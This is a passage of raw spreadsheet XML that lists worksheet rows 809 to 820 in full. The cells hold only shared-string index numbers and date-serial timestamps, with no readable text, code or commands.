      <c r="S809" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T809" s="23"/>
      <c r="U809" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V809" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W809" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X809" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y809" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z809" s="24">
        <v>46078.8505787037</v>
      </c>
      <c r="AA809" s="23"/>
      <c r="AB809" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC809" s="23"/>
      <c r="AD809" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE809" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF809" s="23"/>
      <c r="AG809" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH809" s="24">
        <v>46078.8506134259</v>
      </c>
      <c r="AI809" s="23"/>
      <c r="AJ809" s="23"/>
      <c r="AK809" s="23"/>
      <c r="AL809" s="23"/>
      <c r="AM809" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN809" s="23"/>
      <c r="AO809" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP809" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ809" s="24">
        <v>46078.871412037</v>
      </c>
      <c r="AR809" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS809" s="23"/>
      <c r="AT809" s="23"/>
      <c r="AU809" s="23"/>
    </row>
    <row r="810" s="1" customFormat="1" spans="1:47">
      <c r="A810" s="23" t="s">
        <v>9250</v>
      </c>
      <c r="B810" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C810" s="23" t="s">
        <v>1955</v>
      </c>
      <c r="D810" s="23" t="s">
        <v>9251</v>
      </c>
      <c r="E810" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F810" s="23" t="s">
        <v>9944</v>
      </c>
      <c r="G810" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H810" s="23"/>
      <c r="I810" s="23" t="s">
        <v>8479</v>
      </c>
      <c r="J810" s="23" t="s">
        <v>1955</v>
      </c>
      <c r="K810" s="23" t="s">
        <v>8598</v>
      </c>
      <c r="L810" s="24">
        <v>46078.8087731482</v>
      </c>
      <c r="M810" s="24">
        <v>46078.8087731482</v>
      </c>
      <c r="N810" s="23"/>
      <c r="O810" s="23"/>
      <c r="P810" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q810" s="23"/>
      <c r="R810" s="23" t="s">
        <v>1955</v>
      </c>
      <c r="S810" s="23" t="s">
        <v>9945</v>
      </c>
      <c r="T810" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U810" s="23" t="s">
        <v>9254</v>
      </c>
      <c r="V810" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W810" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X810" s="23" t="s">
        <v>8680</v>
      </c>
      <c r="Y810" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z810" s="24">
        <v>46078.8096412037</v>
      </c>
      <c r="AA810" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB810" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC810" s="23"/>
      <c r="AD810" s="23" t="s">
        <v>8462</v>
      </c>
      <c r="AE810" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF810" s="23"/>
      <c r="AG810" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH810" s="24">
        <v>46078.8096527778</v>
      </c>
      <c r="AI810" s="23"/>
      <c r="AJ810" s="23"/>
      <c r="AK810" s="23" t="s">
        <v>9946</v>
      </c>
      <c r="AL810" s="23" t="s">
        <v>9256</v>
      </c>
      <c r="AM810" s="23" t="s">
        <v>8441</v>
      </c>
      <c r="AN810" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO810" s="23"/>
      <c r="AP810" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ810" s="24">
        <v>46078.830474537</v>
      </c>
      <c r="AR810" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS810" s="23"/>
      <c r="AT810" s="23"/>
      <c r="AU810" s="23"/>
    </row>
    <row r="811" s="1" customFormat="1" spans="1:47">
      <c r="A811" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B811" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C811" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D811" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E811" s="23" t="s">
        <v>8539</v>
      </c>
      <c r="F811" s="23" t="s">
        <v>9947</v>
      </c>
      <c r="G811" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H811" s="23"/>
      <c r="I811" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J811" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K811" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L811" s="24">
        <v>46078.7427430556</v>
      </c>
      <c r="M811" s="24">
        <v>46078.7427430556</v>
      </c>
      <c r="N811" s="23" t="s">
        <v>8586</v>
      </c>
      <c r="O811" s="23"/>
      <c r="P811" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q811" s="23"/>
      <c r="R811" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S811" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T811" s="23"/>
      <c r="U811" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V811" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W811" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X811" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y811" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z811" s="24">
        <v>46078.7433680556</v>
      </c>
      <c r="AA811" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB811" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC811" s="23"/>
      <c r="AD811" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE811" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF811" s="23"/>
      <c r="AG811" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH811" s="24">
        <v>46078.7434027778</v>
      </c>
      <c r="AI811" s="23"/>
      <c r="AJ811" s="23"/>
      <c r="AK811" s="23"/>
      <c r="AL811" s="23"/>
      <c r="AM811" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN811" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO811" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP811" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ811" s="24">
        <v>46078.7642013889</v>
      </c>
      <c r="AR811" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS811" s="23" t="s">
        <v>9833</v>
      </c>
      <c r="AT811" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="AU811" s="23" t="s">
        <v>8999</v>
      </c>
    </row>
    <row r="812" s="1" customFormat="1" spans="1:47">
      <c r="A812" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B812" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C812" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D812" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E812" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F812" s="23" t="s">
        <v>9948</v>
      </c>
      <c r="G812" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H812" s="23"/>
      <c r="I812" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J812" s="23" t="s">
        <v>8423</v>
      </c>
      <c r="K812" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L812" s="24">
        <v>46078.705150463</v>
      </c>
      <c r="M812" s="24">
        <v>46078.7082060185</v>
      </c>
      <c r="N812" s="23" t="s">
        <v>8666</v>
      </c>
      <c r="O812" s="23"/>
      <c r="P812" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q812" s="23"/>
      <c r="R812" s="23" t="s">
        <v>1698</v>
      </c>
      <c r="S812" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T812" s="23"/>
      <c r="U812" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V812" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W812" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X812" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y812" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z812" s="24">
        <v>46078.7054398148</v>
      </c>
      <c r="AA812" s="23"/>
      <c r="AB812" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC812" s="23"/>
      <c r="AD812" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE812" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF812" s="23"/>
      <c r="AG812" s="25" t="s">
        <v>8567</v>
      </c>
      <c r="AH812" s="24">
        <v>46078.7055208333</v>
      </c>
      <c r="AI812" s="23"/>
      <c r="AJ812" s="23"/>
      <c r="AK812" s="23"/>
      <c r="AL812" s="23"/>
      <c r="AM812" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN812" s="23"/>
      <c r="AO812" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP812" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ812" s="24">
        <v>46078.7262731481</v>
      </c>
      <c r="AR812" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS812" s="23"/>
      <c r="AT812" s="23"/>
      <c r="AU812" s="23"/>
    </row>
    <row r="813" s="1" customFormat="1" spans="1:47">
      <c r="A813" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B813" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C813" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D813" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E813" s="23" t="s">
        <v>8539</v>
      </c>
      <c r="F813" s="23" t="s">
        <v>9949</v>
      </c>
      <c r="G813" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H813" s="23"/>
      <c r="I813" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J813" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K813" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L813" s="24">
        <v>46078.6970138889</v>
      </c>
      <c r="M813" s="24">
        <v>46078.6970138889</v>
      </c>
      <c r="N813" s="23" t="s">
        <v>9950</v>
      </c>
      <c r="O813" s="23"/>
      <c r="P813" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q813" s="23"/>
      <c r="R813" s="23" t="s">
        <v>9951</v>
      </c>
      <c r="S813" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T813" s="23"/>
      <c r="U813" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V813" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W813" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X813" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y813" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z813" s="24">
        <v>46078.6979050926</v>
      </c>
      <c r="AA813" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB813" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC813" s="23"/>
      <c r="AD813" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE813" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF813" s="23"/>
      <c r="AG813" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH813" s="24">
        <v>46078.6979282407</v>
      </c>
      <c r="AI813" s="23"/>
      <c r="AJ813" s="23"/>
      <c r="AK813" s="23"/>
      <c r="AL813" s="23"/>
      <c r="AM813" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN813" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO813" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP813" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ813" s="24">
        <v>46078.7187384259</v>
      </c>
      <c r="AR813" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS813" s="23" t="s">
        <v>9833</v>
      </c>
      <c r="AT813" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="AU813" s="23" t="s">
        <v>8999</v>
      </c>
    </row>
    <row r="814" s="1" customFormat="1" spans="1:47">
      <c r="A814" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B814" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C814" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D814" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E814" s="23" t="s">
        <v>8539</v>
      </c>
      <c r="F814" s="23" t="s">
        <v>9952</v>
      </c>
      <c r="G814" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H814" s="23"/>
      <c r="I814" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J814" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K814" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L814" s="24">
        <v>46078.6644444444</v>
      </c>
      <c r="M814" s="24">
        <v>46078.6644444444</v>
      </c>
      <c r="N814" s="23" t="s">
        <v>8666</v>
      </c>
      <c r="O814" s="23"/>
      <c r="P814" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q814" s="23"/>
      <c r="R814" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S814" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T814" s="23"/>
      <c r="U814" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V814" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W814" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X814" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y814" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z814" s="24">
        <v>46078.6652314815</v>
      </c>
      <c r="AA814" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB814" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC814" s="23"/>
      <c r="AD814" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE814" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF814" s="23"/>
      <c r="AG814" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH814" s="24">
        <v>46078.6652662037</v>
      </c>
      <c r="AI814" s="23"/>
      <c r="AJ814" s="23"/>
      <c r="AK814" s="23"/>
      <c r="AL814" s="23"/>
      <c r="AM814" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN814" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO814" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP814" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ814" s="24">
        <v>46078.6860648148</v>
      </c>
      <c r="AR814" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS814" s="23" t="s">
        <v>9833</v>
      </c>
      <c r="AT814" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="AU814" s="23" t="s">
        <v>8999</v>
      </c>
    </row>
    <row r="815" s="1" customFormat="1" spans="1:47">
      <c r="A815" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B815" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C815" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D815" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E815" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F815" s="23" t="s">
        <v>9953</v>
      </c>
      <c r="G815" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H815" s="23"/>
      <c r="I815" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J815" s="23" t="s">
        <v>8423</v>
      </c>
      <c r="K815" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L815" s="24">
        <v>46078.6327083333</v>
      </c>
      <c r="M815" s="24">
        <v>46078.6432407407</v>
      </c>
      <c r="N815" s="23" t="s">
        <v>9950</v>
      </c>
      <c r="O815" s="23"/>
      <c r="P815" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q815" s="23"/>
      <c r="R815" s="23" t="s">
        <v>1018</v>
      </c>
      <c r="S815" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T815" s="23"/>
      <c r="U815" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V815" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W815" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X815" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y815" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z815" s="24">
        <v>46078.6329166667</v>
      </c>
      <c r="AA815" s="23"/>
      <c r="AB815" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC815" s="23"/>
      <c r="AD815" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE815" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF815" s="23"/>
      <c r="AG815" s="25" t="s">
        <v>8439</v>
      </c>
      <c r="AH815" s="24">
        <v>46078.632974537</v>
      </c>
      <c r="AI815" s="23"/>
      <c r="AJ815" s="23"/>
      <c r="AK815" s="23"/>
      <c r="AL815" s="23"/>
      <c r="AM815" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN815" s="23"/>
      <c r="AO815" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP815" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ815" s="24">
        <v>46078.65375</v>
      </c>
      <c r="AR815" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS815" s="23"/>
      <c r="AT815" s="23"/>
      <c r="AU815" s="23"/>
    </row>
    <row r="816" s="1" customFormat="1" spans="1:47">
      <c r="A816" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B816" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C816" s="23" t="s">
        <v>1711</v>
      </c>
      <c r="D816" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E816" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F816" s="23" t="s">
        <v>9954</v>
      </c>
      <c r="G816" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H816" s="23"/>
      <c r="I816" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J816" s="23" t="s">
        <v>9372</v>
      </c>
      <c r="K816" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L816" s="24">
        <v>46078.6058912037</v>
      </c>
      <c r="M816" s="24">
        <v>46078.6243055556</v>
      </c>
      <c r="N816" s="23"/>
      <c r="O816" s="23"/>
      <c r="P816" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q816" s="23"/>
      <c r="R816" s="23" t="s">
        <v>9955</v>
      </c>
      <c r="S816" s="23" t="s">
        <v>1711</v>
      </c>
      <c r="T816" s="23"/>
      <c r="U816" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V816" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W816" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X816" s="23" t="s">
        <v>8471</v>
      </c>
      <c r="Y816" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z816" s="24">
        <v>46078.6060416667</v>
      </c>
      <c r="AA816" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB816" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC816" s="23"/>
      <c r="AD816" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE816" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF816" s="23"/>
      <c r="AG816" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH816" s="24">
        <v>46078.6060648148</v>
      </c>
      <c r="AI816" s="23"/>
      <c r="AJ816" s="23"/>
      <c r="AK816" s="23"/>
      <c r="AL816" s="23"/>
      <c r="AM816" s="23" t="s">
        <v>8463</v>
      </c>
      <c r="AN816" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO816" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP816" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ816" s="24">
        <v>46078.626875</v>
      </c>
      <c r="AR816" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS816" s="23"/>
      <c r="AT816" s="23"/>
      <c r="AU816" s="23"/>
    </row>
    <row r="817" s="1" customFormat="1" spans="1:47">
      <c r="A817" s="23" t="s">
        <v>8399</v>
      </c>
      <c r="B817" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C817" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D817" s="23" t="s">
        <v>8401</v>
      </c>
      <c r="E817" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F817" s="23" t="s">
        <v>9956</v>
      </c>
      <c r="G817" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H817" s="23"/>
      <c r="I817" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J817" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K817" s="23" t="s">
        <v>8404</v>
      </c>
      <c r="L817" s="24">
        <v>46077.6275694444</v>
      </c>
      <c r="M817" s="24">
        <v>46078.6228356482</v>
      </c>
      <c r="N817" s="23" t="s">
        <v>8424</v>
      </c>
      <c r="O817" s="23"/>
      <c r="P817" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="Q817" s="23"/>
      <c r="R817" s="23" t="s">
        <v>9951</v>
      </c>
      <c r="S817" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T817" s="23"/>
      <c r="U817" s="23" t="s">
        <v>8406</v>
      </c>
      <c r="V817" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W817" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X817" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y817" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z817" s="24">
        <v>46077.6285185185</v>
      </c>
      <c r="AA817" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB817" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC817" s="23"/>
      <c r="AD817" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE817" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF817" s="23"/>
      <c r="AG817" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH817" s="24">
        <v>46077.6285416667</v>
      </c>
      <c r="AI817" s="23"/>
      <c r="AJ817" s="23"/>
      <c r="AK817" s="23" t="s">
        <v>9957</v>
      </c>
      <c r="AL817" s="23" t="s">
        <v>8411</v>
      </c>
      <c r="AM817" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN817" s="23" t="s">
        <v>8412</v>
      </c>
      <c r="AO817" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP817" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ817" s="24">
        <v>46077.6493518519</v>
      </c>
      <c r="AR817" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS817" s="23"/>
      <c r="AT817" s="23"/>
      <c r="AU817" s="23"/>
    </row>
    <row r="818" s="1" customFormat="1" spans="1:47">
      <c r="A818" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B818" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C818" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D818" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E818" s="23" t="s">
        <v>8539</v>
      </c>
      <c r="F818" s="23" t="s">
        <v>9958</v>
      </c>
      <c r="G818" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H818" s="23"/>
      <c r="I818" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J818" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K818" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L818" s="24">
        <v>46078.5895486111</v>
      </c>
      <c r="M818" s="24">
        <v>46078.6166782407</v>
      </c>
      <c r="N818" s="23" t="s">
        <v>8666</v>
      </c>
      <c r="O818" s="23"/>
      <c r="P818" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q818" s="23"/>
      <c r="R818" s="23" t="s">
        <v>8641</v>
      </c>
      <c r="S818" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T818" s="23"/>
      <c r="U818" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V818" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W818" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X818" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y818" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z818" s="24">
        <v>46078.5903935185</v>
      </c>
      <c r="AA818" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB818" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC818" s="23"/>
      <c r="AD818" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE818" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF818" s="23"/>
      <c r="AG818" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH818" s="24">
        <v>46078.5904282407</v>
      </c>
      <c r="AI818" s="23"/>
      <c r="AJ818" s="23"/>
      <c r="AK818" s="23"/>
      <c r="AL818" s="23"/>
      <c r="AM818" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN818" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO818" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP818" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ818" s="24">
        <v>46078.6112268519</v>
      </c>
      <c r="AR818" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS818" s="23" t="s">
        <v>9833</v>
      </c>
      <c r="AT818" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="AU818" s="23" t="s">
        <v>8999</v>
      </c>
    </row>
    <row r="819" s="1" customFormat="1" spans="1:47">
      <c r="A819" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B819" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C819" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D819" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E819" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F819" s="23" t="s">
        <v>9959</v>
      </c>
      <c r="G819" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H819" s="23"/>
      <c r="I819" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J819" s="23" t="s">
        <v>8423</v>
      </c>
      <c r="K819" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L819" s="24">
        <v>46078.5960300926</v>
      </c>
      <c r="M819" s="24">
        <v>46078.5960300926</v>
      </c>
      <c r="N819" s="23" t="s">
        <v>8405</v>
      </c>
      <c r="O819" s="23"/>
      <c r="P819" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q819" s="23"/>
      <c r="R819" s="23" t="s">
        <v>8564</v>
      </c>
      <c r="S819" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T819" s="23"/>
      <c r="U819" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V819" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W819" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X819" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y819" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z819" s="24">
        <v>46078.5962731481</v>
      </c>
      <c r="AA819" s="23"/>
      <c r="AB819" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC819" s="23"/>
      <c r="AD819" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE819" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF819" s="23"/>
      <c r="AG819" s="25" t="s">
        <v>8475</v>
      </c>
      <c r="AH819" s="24">
        <v>46078.5963194444</v>
      </c>
      <c r="AI819" s="23"/>
      <c r="AJ819" s="23"/>
      <c r="AK819" s="23"/>
      <c r="AL819" s="23"/>
      <c r="AM819" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN819" s="23"/>
      <c r="AO819" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP819" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ819" s="24">
        <v>46078.6171064815</v>
      </c>
      <c r="AR819" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS819" s="23"/>
      <c r="AT819" s="23"/>
      <c r="AU819" s="23"/>
    </row>
    <row r="820" s="1" customFormat="1" spans="1:47">
      <c r="A820" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B820" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C820" s="23" t="s">
        <v>9501</v>
      </c>
      <c r="D820" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E820" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F820" s="23" t="s">
        <v>9960</v>
      </c>
      <c r="G820" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H820" s="23"/>
      <c r="I820" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J820" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K820" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L820" s="24">
        <v>46078.5694444444</v>
      </c>
      <c r="M820" s="24">
        <v>46078.5694444444</v>
      </c>
      <c r="N820" s="23"/>
      <c r="O820" s="23"/>
      <c r="P820" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q820" s="23"/>
      <c r="R820" s="23" t="s">
        <v>9501</v>
      </c>
      <c r="S820" s="23" t="s">
        <v>8621</v>
      </c>
      <c r="T820" s="23"/>
      <c r="U820" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V820" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W820" s="23" t="s">
        <v>8460</v>
